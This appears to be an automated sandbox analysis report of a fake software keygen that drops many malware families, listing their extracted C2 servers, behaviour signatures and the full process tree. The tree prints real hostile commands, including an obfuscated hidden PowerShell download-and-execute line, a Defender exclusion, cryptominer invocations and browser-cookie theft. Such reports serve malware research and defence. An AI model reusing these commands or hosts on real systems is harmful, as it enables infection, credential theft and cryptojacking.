Analysis
-
max time kernel
37s -
max time network
484s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-03-2021 21:38
General
-
Target
Ciberlink.power.dvd.8.delux.keygen.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
fickerstealer
C2
deniedfight.com:80
lukkeze.space:80
Extracted
Family
raccoon
Botnet
dfa7b4d385486b737f84d608857eb43733ffd299
Attributes
-
url4cnc
https://telete.in/j9ca1pel
rc4.plain
rc4.plain
Extracted
Family
icedid
Campaign
1235390667
C2
petelbomber.xyz
Extracted
Family
redline
Botnet
black
C2
blackeyed.top:80
Extracted
Family
redline
Botnet
19test200
C2
erherst.tk:80
Extracted
Family
cryptbot
C2
bazfr32.top
morwhy03.top
Attributes
-
payload_url
http://akrvt04.top/download.php?file=lv.exe
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2020
C2
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Extracted
Family
amadey
Version
2.14
C2
176.111.174.249/j7csltegf/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CryptBot
A C++ stealer distributed widely in bundle with other software.
-
CryptBot Payload 2 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
IcedID First Stage Loader 1 IoCs
-
XMRig Miner Payload 8 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 5 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 10 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 4 IoCs
-
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 1 3.1616622034.605bb1d22c01a 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\45BA75ZGKR\multitimer.exe" 2 3.1616622034.605bb1d22c01a7⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\be4c4cghopz\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\be4c4cghopz\AwesomePoolU1.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe"C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OQSDJ.tmp\5dzqe0dgf1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-OQSDJ.tmp\5dzqe0dgf1e.tmp" /SL5="$501D2,2592217,780800,C:\Users\Admin\AppData\Local\Temp\cfp1raavmlf\5dzqe0dgf1e.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VG0GF.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-VG0GF.tmp\winlthsth.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 49611⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-44MHB.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-44MHB.tmp\vpn.tmp" /SL5="$202C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ukexn4na2xb\vpn.exe" /silent /subid=4829⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe"C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe" /VERYSILENT /id=5358⤵
-
-
C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe" /Verysilent /subid=5778⤵
-
-
C:\Users\Admin\AppData\Local\Temp\a1tqyl0dfwr\app.exe"C:\Users\Admin\AppData\Local\Temp\a1tqyl0dfwr\app.exe" /8-238⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Icy-Sun"9⤵
-
-
C:\Program Files (x86)\Icy-Sun\7za.exe"C:\Program Files (x86)\Icy-Sun\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Icy-Sun\app.exe" -map "C:\Program Files (x86)\Icy-Sun\WinmonProcessMonitor.sys""9⤵
-
C:\Program Files (x86)\Icy-Sun\app.exe"C:\Program Files (x86)\Icy-Sun\app.exe" -map "C:\Program Files (x86)\Icy-Sun\WinmonProcessMonitor.sys"10⤵
-
-
-
C:\Program Files (x86)\Icy-Sun\7za.exe"C:\Program Files (x86)\Icy-Sun\7za.exe" e -p154.61.71.13 winamp.7z9⤵
-
-
C:\Program Files (x86)\Icy-Sun\app.exe"C:\Program Files (x86)\Icy-Sun\app.exe" /8-239⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe"C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe" /quiet SILENT=1 AF=7568⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\0mojfomlx00.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rhwq0i3sov5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616366102 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe"C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-V5QU0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-V5QU0.tmp\setups.tmp" /SL5="$5004A,250374,58368,C:\Users\Admin\AppData\Local\Temp\B8K79K2DK7\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"C:\Users\Admin\AppData\Roaming\10D9.tmp.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\20C8.tmp.exe"6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3fbb85ac..exe"C:\Users\Admin\AppData\Local\Temp\3fbb85ac..exe"5⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\ProgramData\8966476.exe"C:\ProgramData\8966476.exe"5⤵
-
-
C:\ProgramData\4454125.exe"C:\ProgramData\4454125.exe"5⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
-
-
-
C:\ProgramData\599427.exe"C:\ProgramData\599427.exe"5⤵
-
C:\ProgramData\599427.exe"{path}"6⤵
-
-
-
C:\ProgramData\5552864.exe"C:\ProgramData\5552864.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\is-O12SA.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-O12SA.tmp\vict.tmp" /SL5="$9002E,870426,780800,C:\Users\Admin\AppData\Local\Temp\1dzcrhq2g3l\vict.exe" /VERYSILENT /id=5351⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SECKS.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-SECKS.tmp\winhost.exe" 5352⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"3⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"4⤵
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dll"5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dllVHsPH6KBq.dll"3⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\LldVzhqqk.dllVHsPH6KBq.dll"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-NA6P6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-NA6P6.tmp\IBInstaller_97039.tmp" /SL5="$3028E,9887378,721408,C:\Users\Admin\AppData\Local\Temp\czlox43mlna\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-0E8G3.tmp\{app}\chrome_proxy.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-7RMC1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RMC1.tmp\Setup3310.tmp" /SL5="$402B8,138429,56832,C:\Users\Admin\AppData\Local\Temp\cd0uvwurjen\Setup3310.exe" /Verysilent /subid=5771⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B3DD3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B3DD3.tmp\Setup.exe" /Verysilent2⤵
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b edge5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b chrome5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b firefox5⤵
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 7644⤵
- Program crash
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"3⤵
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ADT1K.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-ADT1K.tmp\LabPicV3.tmp" /SL5="$402DE,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KDKKF.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-KDKKF.tmp\ppppppfy.exe" /S /UID=lab2145⤵
-
C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe"C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TMA0S.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-TMA0S.tmp\prolab.tmp" /SL5="$40354,575243,216576,C:\Program Files\Windows Photo Viewer\PXHSNBXCBJ\prolab.exe" /VERYSILENT7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ac-85550-618-13897-96f4552712ef0\Rubatykiqy.exe"C:\Users\Admin\AppData\Local\Temp\ac-85550-618-13897-96f4552712ef0\Rubatykiqy.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exeC:\Users\Admin\AppData\Local\Temp\kjhv4fpm.nxf\gaooo.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\whbl23sb.yrl\md7_7dfj.exe8⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exeC:\Users\Admin\AppData\Local\Temp\xjye0soo.x5t\customer6.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"9⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ehagfwjy.o4v\askinstall31.exe8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\v1mwnhjk.bfl\HookSetp.exe8⤵
-
C:\ProgramData\4797612.exe"C:\ProgramData\4797612.exe"9⤵
-
-
C:\ProgramData\3512713.exe"C:\ProgramData\3512713.exe"9⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exeC:\Users\Admin\AppData\Local\Temp\snqgmj0j.15d\BlueSignal_installer.exe8⤵
-
-
-
